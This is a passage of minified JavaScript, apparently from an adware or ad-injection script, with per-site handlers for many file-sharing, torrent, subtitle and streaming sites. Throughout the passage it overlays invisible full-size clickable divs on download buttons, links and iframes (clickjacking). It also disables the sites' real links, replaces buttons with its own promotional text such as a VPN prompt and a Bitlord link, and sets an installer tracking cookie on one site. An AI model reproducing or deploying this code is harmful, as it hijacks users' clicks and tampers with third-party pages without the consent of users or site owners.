k=h[e].innerText?h[e].innerText:h[e].textContent;if(\"trackOutboundLink(this, 'Outbound Links', 'slinks.com'); return false;\"==h[e].getAttribute(\"onclick\")&&\"Stream Video Now!\"==k){k=document.createElement(\"a\");k.className=\"down\";k.setAttribute(\"href\",\"javascript:void(0);\");k.innerText?k.innerText=\"Stream Video Now!\":\nk.textContent=\"Stream Video Now!\";var l=h[e].parentNode,p=l.children[l.children.length-1];l.removeChild(h[e]);if(p)try{l.insertBefore(k,p)}catch(v){l.appendChild(k)}else l.appendChild(k)}}h=document.getElementsByTagName(\"a\");for(e=0;e<h.length;e++)if(\"getDownload();\"==h[e].getAttribute(\"onclick\"))if(k=document.createElement(\"p\"),k.className=\"dloadh\",k.setAttribute(\"href\",\"javascript:void(0);\"),k.innerText?k.innerText=\" \":k.textContent=\" \",l=h[e].parentNode,p=l.children[l.children.length-1],l.removeChild(h[e]),\np)try{l.insertBefore(k,p)}catch(w){l.appendChild(k)}else l.appendChild(k)},1E3);h=document.createElement(\"script\");h.type=\"text/javascript\";h[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var h=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+h.top+\"px;left:\"+h.left+\n\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(e){}}.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(h)}}};this[\"ehd.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(g=document.createElement(\"img\"),g.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),g.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",\nf=document.getElementById(\"r1113566095\").parentNode,f.style.position=\"relative\",f.appendChild(g))}};this[\"hesefiles.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var h=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",\n!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))h();else{var e=document.createElement(\"script\");e.type=\"text/javascript\";e.innerHTML=\"(\"+h.toString()+\")()\";document.body.appendChild(e)}}}};this[\"sharebeast.com\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var h=document.getElementsByTagName(\"div\"),e;for(e in h)h[e]&&h[e].style&&\"fixed\"==h[e].style.position&&\"solid\"==\nh[e].style.borderBottomStyle&&(h[e].style.display=\"none\")}}};this[\"coolrom.com\"]=new function(){this.init=function(){for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++)-1<h[e].src.indexOf(\"/images/download_large.png\")&&h[e].parentNode.setAttribute(\"href\",\"javascript:void(0);\");h=new Date;h.setTime(h.getTime()+2592E6);h=\"; expires=\"+h.toGMTString();document.cookie=\"installer=14604\"+h+\"; path=/;domain=.coolrom.com\"}};this[\"ebookbrowsee.net\"]=new function(){this.init=function(){}};this[\"mirrorcreator.com\"]=\nnew function(){this.init=function(){if(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var h=[\"verticdn.com\"],e=0;e<document.links.length;e++)for(var k=document.links[e],l=k.host,m=0;m<h.length;m++)h[m]==l&&(k.setAttribute(\"onclick\",\"return false\"),k.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"cloud-vibe.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),\na.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"mp3seal.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",\nfunction(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"mp3vampire.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",\nfunction(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"minecraftdl.com\"]=new function(){this.init=function(){-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));if(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=\n0;i<document.links.length;i++){var h=document.links[i];\".exe\"==h.href.substr(-4)&&(h=h.parentNode,h.style.position=\"relative\",d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.top=0,d.style.left=0,d.style.width=\"100%\",d.style.height=\"100%\",d.style.cursor=\"pointer\",d.style.zIndex=9999,h.appendChild(d))}}};this[\"leunlckr.co\"]=new function(){this.init=function(){if(-1<document.location.host.indexOf(\"leunlckr.co\")){var h=document.getElementsByTagName(\"button\")[0],e=document.createElement(\"button\");\ne.className=h.className;e.innerHTML=h.innerHTML;h.parentNode.insertBefore(e,h);h.parentNode.removeChild(h)}}};this[\"go.theadsnet.com\"]=new function(){this.init=function(){-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");(function(){var h=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var e=setInterval(function(){try{var k=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*k.children[2].children[1].children[1].innerText);m.push(1*k.children[2].children[2].children[1].innerText);\nm.push(1*k.children[3].children[1].children[1].innerText);m.push(1*k.children[3].children[2].children[1].innerText);for(var n=k=0;n<m.length;n++)k+=m[n];if(!(0<k)){clearInterval(e);var q=document.createElement(\"div\");q.style.position=\"absolute\";q.style.top=0;q.style.left=0;q.style.width=\"100%\";q.style.height=\"100%\";q.style.zIndex=\"9999\";q.style.cursor=\"pointer\";var p=document.getElementById(\"ucd-countdown-1-content\").children[1];p.style.position=\"relative\";p.appendChild(q)}}catch®{try{var v=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),\nfunction(){v+=1*jQuery(this).text()});if(0===v){clearInterval(e);var w=jQuery(\"#ucd-countdown-1-content iframe\"),x=w.parent();w.remove();x.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(u){\"undefined\"!==typeof h&&30<++h&&clearInterval(e)}}},750)}catch(k){}})()}};this[\"ziddu.com\"]=new function(){this.init=function(){var h=0,e=setInterval(function(){h++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var k=0;k<document.links.length;k++)try{var l=\ndocument.links[k].href.toLowerCase();if(-1==l.indexOf(\"ww.ziddu.co\")&&-1==l.indexOf(\"#\")&&-1==l.indexOf(\"tunes.apple.co\")&&-1==l.indexOf(\"lay.google.co\")&&-1==l.indexOf(\"/gallery/\")){try{for(var m=document.links[k],n=0;15>=n;n++)m=m.parentNode;if(-1<m.className.indexOf(\"footerbg\"))continue}catch(p){}var t=document.links[k].parentNode;if(!(-1<t.className.indexOf(\"addthis_toolbox\"))){t.style.position=\"relative\";var r=document.createElement(\"div\");r.style.position=\"absolute\";r.style.left=0;r.style.top=\n0;r.style.width=\"100%\";r.style.height=\"100%\";r.style.zIndex=\"9999\";r.style.cursor=\"pointer\";t.appendChild®}}}catch(v){}l=document.getElementsByTagName(\"iframe\");for(k=0;k<l.length;k++)try{-1==l[k].src.indexOf(\"acebook.co\")&&-1==l[k].src.indexOf(\"cp.crwdcntrl.ne\")&&(t=l[k].parentNode,t.style.position=\"relative\",r=document.createElement(\"div\"),r.style.position=\"absolute\",r.style.left=0,r.style.top=0,r.style.width=\"100%\",r.style.height=\"100%\",r.style.zIndex=\"9999\",r.style.cursor=\"pointer\",r.id=k,t.appendChild®)}catch(w){}}20<\nh&&clearInterval(e)},500)}};this[\"pensubtitles.us\"]=new function(){this.init=function(){if(-1<window.location.href.indexOf(\"/opensubtitles-playe\")){var h=document.getElementById(\"divPlayerDesc\");if(null!=h){h.style.position=\"relative\";var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.zIndex=\"2000\";h.appendChild(e);if(h=h.children[0]){var k=h.children[0];k&&(k.setAttribute(\"href\",\"javascript:void(0);\"),\nk.setAttribute(\"target\",\"_self\"))}}h=document.getElementById(\"divPlayerHead\");if(null!=h)for(var l=0;l<h.children.length;l++)if(\"span\"==h.children[l].tagName.toLowerCase()){var m=h.children[l],e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"106%\";e.style.height=\"70px\";e.style.cursor=\"pointer\";e.style.top=\"-50px\";e.style.left=\"-6%\";e.style.zIndex=\"2000\";if(k=m.children[0])k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\");m.style.position=\"relative\";\nm.appendChild(e)}}}};this[\"opensubtitles.org\"]=new function(){this.init=function(){new function(){var h=document.getElementById(\"scrubbuad\");h&&(h.style.zIndex=\"15\",e=document.createElement(\"div\"),e.style.zIndex=\"15000\",e.style.right=\"9px\",e.style.bottom=\"0\",e.style.position=\"fixed\",e.style.padding=\"0\",e.style.margin=\"0 0 30px 0\",e.style.width=\"220px\",e.style.height=\"72px\",e.style.overflow=\"visible\",e.style.cursor=\"pointer\",document.getElementsByTagName(\"body\")[0].firstChild.appendChild(e));if(-1<\nwindow.location.href.indexOf(\"/opensubtitles-playe\")){h=document.getElementById(\"divPlayerDesc\");if(null!=h){h.style.position=\"relative\";var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.zIndex=\"2000\";h.appendChild(e)}h=document.getElementById(\"divPlayerHead\");if(null!=h)for(var k=0;k<h.children.length;k++)if(\"span\"==h.children[k].tagName.toLowerCase()){var l=h.children[k],e=document.createElement(\"div\");\ne.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"70px\";e.style.cursor=\"pointer\";e.style.top=\"-50px\";e.style.zIndex=\"2000\";l.style.position=\"relative\";l.appendChild(e)}}for(h=0;h<document.links.length;h++)e=document.links[h],(k=e.getAttribute(\"href\"))&&-1<k.indexOf(\"ads2.opensubtitles.org/www/delivery/ck.php\")&&(k=p.utils.duplicateElement(e),l=e.parentNode,l.insertBefore(k,e),l.removeChild(e))}}};this[\"romptfile.co\"]=new function(){this.init=function(){if(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var h=\n{},e=document.getElementsByTagName(\"iframe\"),k=0;k<e.length;k++)\"300\"==e[k].getAttribute(\"width\")&&\"250\"==e[k].getAttribute(\"height\")&&(h=e[k].parentNode);h.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";h.appendChild(d)}}};this[\"pensoftwareupdater.co\"]=new function(){this.init=function(){new function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==\ntypeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var h=$(\".download\").parent();h.css(\"position\",\"relative\");var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.zIndex=\"2000\";e.style.height=\"100%\";e.style.width=\"122px\";e.style.right=\"0\";e.style.top=\"0\";e.style.cursor=\"pointer\";h.append(e);h=$(\"#addBoxX\").parent();h.css(\"position\",\"relative\");e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.zIndex=\"2000\";e.style.height=\"45px\";e.style.width=\"101px\";\ne.style.right=\"22px\";e.style.bottom=\"16px\";e.style.cursor=\"pointer\";h.append(e);window.__qqcount++;10<window.__qqcount&&clearInterval(window.__qqint)},250);else for(var h=document.links,e={},k={},l=0;l<h.length;l++)e=h[l].getAttribute(\"href\"),null!=e&&-1<e.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(e=h[l].getAttribute(\"id\"),null!=e&&\"addBoxX\"==e?(k=h[l].parentNode,k.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.zIndex=\"2000\",e.style.height=\n\"45px\",e.style.width=\"101px\",e.style.right=\"22px\",e.style.bottom=\"16px\"):(k=h[l].parentNode,k.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.zIndex=\"2000\",e.style.height=\"100%\",e.style.width=\"122px\",e.style.right=\"0\",e.style.top=\"0\"),e.style.cursor=\"pointer\",k.appendChild(e))}}};this[\"veehd.com\"]=new function(){this.init=function(){new function(){if(-1<window.location.href.indexOf(\"veehd.com/video/\")){var h=document.getElementsByTagName(\"iframe\")[0],\ne={};null!=h&&(h=h.parentNode,e=document.createElement(\"div\"),e.style.top=\"0\",e.style.width=\"100%\",e.style.height=\"100%\",e.style.cursor=\"pointer\",e.style.zIndex=\"2000\",e.style.position=\"absolute\",h.style.position=\"relative\",h.appendChild(e));h=document.getElementById(\"preview\");null!=h&&(e=document.createElement(\"div\"),e.style.top=\"0\",e.style.width=\"100%\",e.style.height=\"100%\",e.style.cursor=\"pointer\",e.style.zIndex=\"2000\",e.style.position=\"absolute\",h.style.position=\"relative\",h.appendChild(e))}else for(var e=\ndocument.getElementsByTagName(\"a\"),k=0;k<e.length;k++)if(\"getDownload();\"==e[k].getAttribute(\"onclick\")){h=document.createElement(\"a\");h.style.cursor=\"pointer\";var l=document.createElement(\"img\");l.setAttribute(\"src\",e[k].children[0].getAttribute(\"src\"));l.setAttribute(\"border\",\"0\");h.appendChild(l);l=e[k].parentNode;l.removeChild(e[k]);e=l.getElementsByTagName(\"div\")[0];l.insertBefore(h,e);break}}}};this[\"ullypcgames.ne\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var h=\ndocument.getElementsByTagName(\"center\"),e=0;e<h.length;e++){var k=h[e].firstChild;\"undefined\"!==typeof k.tagName&&\"a\"==k.tagName.toLowerCase()&&(h[e].style.position=\"relative\",k=document.createElement(\"div\"),k.style.position=\"absolute\",k.style.top=\"0\",k.style.left=\"0\",k.style.width=\"100%\",k.style.height=\"100%\",k.style.zIndex=\"2000\",k.style.cursor=\"pointer\",h[e].appendChild(k))}}};this[\"llplayer.com.b\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"llplayer.com.b\"))for(var h=\ndocument.getElementsByTagName(\"img\"),e=0;e<h.length;e++)if(h[e].getAttribute(\"src\")&&-1<h[e].getAttribute(\"src\").indexOf(\"fullpage_eng.png\")){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.position=\"absolute\";k.style.zIndex=\"9999\";k.style.top=\"0\";k.style.cursor=\"pointer\";var l=h[e].parentNode.parentNode;l.style.position=\"relative\";l.appendChild(k)}}};this[\"ubtitulosespanol.or\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitulosespanol.or\")){var h=\ndocument.links;for(i=0;i<h.length;i++)if(\"Descargue su subt\\u00edtulo aqu\\u00ed\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"ubtitles4free.ne\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitles4free.ne\")){var h=\ndocument.links;for(i=0;i<h.length;i++)if(\"Download Subtitle\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Download Player\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"legendasbrasil.org\"]=new function(){this.init=function(){if(0<\nlocation.host.toLowerCase().indexOf(\"legendasbrasil.org\")){var h=document.links;for(i=0;i<h.length;i++)if(\"Baixar Legenda\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Baixar Player\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Baixe sua legenda aqui\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";\nvar k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"reeroms.co\"]=new function(){this.init=function(){window.location.host.toLowerCase().indexOf(\"reeroms.co\")&&(window.__sdahfjkahfals3243Count=0,window.__sdahfjkahfals3243Int=setInterval(function(){for(var h=document.getElementsByTagName(\"a\"),e=0;e<h.length;e++){var k=\"undefined\"===typeof h[e].innerText?h[e].textContent:h[e].innerText,k=k.trim();if(\"Download\"===k||0==k.indexOf(\"Direct\")){var l=document.createElement(\"div\");\nl.style.width=\"100%\";l.style.height=\"100%\";l.style.position=\"absolute\";l.style.zIndex=\"9999\";l.style.top=\"0\";l.style.cursor=\"pointer\";var m=h[e].parentNode;m.style.position=\"relative\";m.appendChild(l);0==k.indexOf(\"Direct\")&&clearInterval(window.__sdahfjkahfals3243Int)}}40<window.__sdahfjkahfals3243Count++&&clearInterval(window.__sdahfjkahfals3243Int)},500))}};this[\"eneral-ebooks.co\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"eneral-ebooks.co\"))for(var h=\ndocument.getElementsByTagName(\"iframe\"),e=0;e<h.length;e++){var k=h[e].parentNode;if(null!=k){var l=k.getAttribute(\"class\");null!=l&&-1<l.indexOf(\"banner-body\")&&(l=document.createElement(\"div\"),l.style.width=\"100%\",l.style.height=\"100%\",l.style.position=\"absolute\",l.style.zIndex=\"9999\",l.style.top=\"0\",l.style.cursor=\"pointer\",k.style.position=\"relative\",k.appendChild(l))}}}};this[\"stream2watch.me\"]=new function(){this.init=function(){-1<location.host.toLowerCase().indexOf(\"stream2watch.me\")&&(window.__z_tream2count=\n0,window.__z_tream2int=setInterval(function(){20<window.__z_tream2count++&&clearInterval(window.__z_tream2int);var h=document.getElementById(\"rh_toolbar_STRTOPB\"),e=document.getElementById(\"rhfrm_STRTOPB\");if(null!=h&&null!=e){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\"absolute\";h.appendChild(k);e.style.position=\"absolute\";e.style.zIndex=\"-1\";clearInterval(window.__z_tream2int)}},500))}};this[\"old_ki_ckass.to\"]=\nnew function(){var h=this;h.init=function(){location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href&&(h.counter=0,h.kickass=function(){20<++h.counter&&clearInterval(h.interval);var e=p.utils.query_selector_all(\".advertDownload\");if(0<e.length){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\"absolute\";k.style.top=\"0\";k.style.left=\"0\";e[0].appendChild(k);e[0].style.position=\"relative\";e[0].style.overflow=\n\"hidden\";e=e[0].getElementsByTagName(\"a\");for(k=0;k<e.length;k++)e[k].setAttribute(\"href\",\"javascript:void(0);\"),e[k].setAttribute(\"onclick\",\"void(0);\");clearInterval(h.interval)}},h.interval=setInterval(h.kickass,500))}};this[\"kickass.to\"]=new function(){var h=this;h.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){h.counter=0;h.___ZskskskCount=0;h.___ZskskskthisZ=function(){try{20<++h.___ZskskskCount&&clearInterval(h.___ZskskskInter);for(var e=document.getElementsByTagName(\"div\"),\nk=0;k<e.length;k++){var l=e[k].getAttribute(\"align\");if(l&&\"center\"==l){var m=e[k].children[0];if(m&&m.getAttribute&&\"siteButton giantButton\"==m.getAttribute(\"class\")){var n=document.createElement(\"a\");n.style.fontSize=\"20px\";n.style.textAlign=\"center\";n.style.marginBottom=\"5px\";n.className=\"siteButton giantButton\";var p=document.createElement(\"span\");p.innerText?p.innerText=\"Protect yourself now with hide.me VPN\":p.textContent=\"Protect yourself now with hide.me VPN\";n.appendChild(p);e[k].removeChild(m);\ne[k].appendChild(n);clearInterval(h.___ZskskskInter)}}}}catch(u){clearInterval(h.___ZskskskInter)}};h.___ZskskskInter=setInterval(h.___ZskskskthisZ,500);for(var e=p.utils.query_selector_all(\".partner1Button.idownload.icon16\"),k=0;k<e.length;k++){var l=e[k].nextSibling,m=document.createElement(\"a\");m.className=\"partner1Button idownload icon16\";m.setAttribute(\"href\",\"#\");var n=document.createElement(\"span\");m.appendChild(n);n=e[k].parentNode;l?n.insertBefore(m,l):n.appendChild(m);n.removeChild(e[k])}h.counter=\n0;h.kickassx=function(){20<++h.counter&&clearInterval(h.interval);0<p.utils.query_selector_all(\"div#vuzeDownload a\").length&&(document.getElementById(\"vuzeDownload\").parentNode.innerHTML='<div id=\"vuzeDownload\">To download this torrent, you need a BitTorrent client: <a href=\"#\">Bitlord</a></div>',clearInterval(h.interval))};h.interval=setInterval(h.kickassx,500);h.counterClick=0;h.kickassClick=function(){20<++h.counterClick&&clearInterval(h.interval2);var e=p.utils.query_selector_all(\".block.botmarg5px\")[0];\ne&&\"Download faster CLICK HERE\"==(e.innerText?e.innerText:e.textContent)&&(e.innerHTML='<div class=\"block botmarg5px\">Download faster <a href=\"#\">CLICK HERE</a></div>',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"kickass.so\"]=new function(){var h=this;h.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){h.counter=0;h.___ZskskskCount=0;h.___ZskskskthisZ=function(){try{20<++h.___ZskskskCount&&clearInterval(h.___ZskskskInter);\nfor(var e=document.getElementsByTagName(\"div\"),k=0;k<e.length;k++){var l=e[k].getAttribute(\"align\");if(l&&\"center\"==l){var m=e[k].children[0];if(m&&m.getAttribute&&\"siteButton giantButton\"==m.getAttribute(\"class\")){var n=document.createElement(\"a\");n.style.fontSize=\"20px\";n.style.textAlign=\"center\";n.style.marginBottom=\"5px\";n.className=\"siteButton giantButton\";var p=document.createElement(\"span\");p.innerText?p.innerText=\"Protect yourself now with hide.me VPN\":p.textContent=\"Protect yourself now with hide.me VPN\";\nn.appendChild(p);e[k].removeChild(m);e[k].appendChild(n);clearInterval(h.___ZskskskInter)}}}}catch(u){clearInterval(h.___ZskskskInter)}};h.___ZskskskInter=setInterval(h.___ZskskskthisZ,500);for(var e=p.utils.query_selector_all(\".partner1Button.idownload.icon16\"),k=0;k<e.length;k++){var l=e[k].nextSibling,m=document.createElement(\"a\");m.className=\"partner1Button idownload icon16\";m.setAttribute(\"href\",\"#\");var n=document.createElement(\"span\");m.appendChild(n);n=e[k].parentNode;l?n.insertBefore(m,l):\nn.appendChild(m);n.removeChild(e[k])}h.counter=0;h.kickassx=function(){20<++h.counter&&clearInterval(h.interval1);0<p.utils.query_selector_all(\"div#vuzeDownload a\").length&&(document.getElementById(\"vuzeDownload\").parentNode.innerHTML='<div id=\"vuzeDownload\">To download this torrent, you need a BitTorrent client: <a href=\"#\">Bitlord</a></div>',clearInterval(h.interval1))};h.interval1=setInterval(h.kickassx,500);h.counterClick=0;h.kickassClick=function(){20<++h.counterClick&&clearInterval(h.interval2);\nvar e=p.utils.query_selector_all(\".block.botmarg5px\")[0];e&&\"Download faster CLICK HERE\"==(e.innerText?e.innerText:e.textContent)&&(e.innerHTML='<div class=\"block botmarg5px\">Download faster <a href=\"#\">CLICK HERE</a></div>',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"uploadrocket.net\"]=new function(){this.init=function(){var h=p.utils.query_selector_all(\".dlbutton_green\");if(h&&0<h.length){var h=h[0],e=document.createElement(\"a\");e.className=\"dlbutton_green\";\ne.setAttribute(\"href\",\"javascript:void(0)\");var k=document.createElement(\"span\");k.innerText?k.innerText=\"Download Now\":k.textContent=\"Download Now\";e.appendChild(k);k=h.parentNode;k.removeChild(h);k.appendChild(e)}(h=p.utils.query_selector_all(\".middle\"))&&0<h.length&&(h=h[0].children[4])&&h.setAttribute(\"href\",\"javascript:void(0);\");if((h=p.utils.query_selector_all(\"#ID_freeorpremium table tr td a\"))&&0<h.length)for(e=0;e<h.length;e++)h[e].setAttribute(\"href\",\"javascript:void(0);\");(h=p.utils.query_selector_all(\"#ID_freeorpremium input[type='submit']\"))&&\n0<h.length&&h[0].setAttribute(\"type\",\"button\");(h=p.utils.query_selector_all(\"#ID_freeorpremium\"))&&0<h.length&&(h=h[0])&&(h.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.width=\"100%\",e.style.height=\"95px\",e.style.zIndex=\"2000\",e.style.top=\"0\",e.style.cursor=\"pointer\",h.appendChild(e))}};this[\"programas-gratis.net\"]=new function(){this.init=function(){for(var h=p.utils.query_selector_all(\".list.new .download_button\"),e=0;e<h.length;e++){var k=h[e].parentNode;\nk.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"124px\";l.style.height=\"42px\";l.style.zIndex=\"2000\";l.style.top=\"44px\";l.style.right=\"9px\";l.style.cursor=\"pointer\";k.appendChild(l);h[e].setAttribute(\"href\",\"javascript:void(0)\")}}};this[\"programasgratis.es\"]=new function(){this.init=function(){for(var h=p.utils.query_selector_all(\"#bloque_top_portada .programa_top_portada a\"),e=0;e<h.length;e++)if(h[e].setAttribute(\"href\",\"javascript:void(0)\"),\n\"rojo\"!=h[e].className){var k=h[e].parentNode;k.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"100%\";l.style.height=\"152px\";l.style.zIndex=\"2000\";l.style.top=\"0\";l.style.right=\"0\";l.style.cursor=\"pointer\";k.appendChild(l)}h=p.utils.query_selector_all(\".bloque_novedades .link_categoria_descargar\");for(e=0;e<h.length;e++)k=h[e].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),l.style.position=\"absolute\",l.style.width=\n\"124px\",l.style.height=\"42px\",l.style.zIndex=\"2000\",l.style.top=\"-5px\",l.style.right=\"0\",l.style.cursor=\"pointer\",k.appendChild(l),h[e].setAttribute(\"href\",\"javascript:void(0)\")}};this[\"programasejogos.com\"]=new function(){this.init=function(){for(var h=p.utils.query_selector_all(\".enlace_pestania_descargar\"),e=0;e<h.length;e++){var k=h[e].parentNode;k.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"200px\";l.style.height=\"90px\";l.style.zIndex=\n\"2000\";l.style.top=\"65px\";l.style.right=\"0\";l.style.cursor=\"pointer\";k.appendChild(l);h[e].setAttribute(\"href\",\"javascript:void(0)\")}h=[];h=h.concat(p.utils.query_selector_all(\".linea_fondo1 .enlace_pestania_descargar_pequeno\"));h=h.concat(p.utils.query_selector_all(\".linea_fondo1 .boton_clase_listado\"));h=h.concat(p.utils.query_selector_all(\".linea_fondo .enlace_pestania_descargar_pequeno\"));for(e=0;e<h.length;e++)for(var m=0;m<h[e].length;m++)k=h[e][m].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),\nl.style.position=\"absolute\",l.style.width=\"115px\",l.style.height=\"28px\",l.style.zIndex=\"2000\",l.style.top=\"0\",l.style.right=\"0\",l.style.cursor=\"pointer\",k.appendChild(l),h[e][m].setAttribute(\"href\",\"javascript:void(0)\");h=p.utils.query_selector_all(\".pyj_registro_inferior .enlace_pestania_descargar_pequeno\");for(e=0;e<h.length;e++)k=h[e].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),l.style.position=\"absolute\",l.style.width=\"105px\",l.style.height=\"29px\",l.style.zIndex=\"2000\",\nl.style.top=\"3px\",l.style.right=\"-4px\",l.style.cursor=\"pointer\",k.appendChild(l),h[e].setAttribute(\"href\",\"javascript:void(0)\")}};this[\"uploading.com\"]=new function(){this.init=function(){setTimeout(function(){var h=p.utils.query_selector_all(\".method_title\")[0];if(h){var 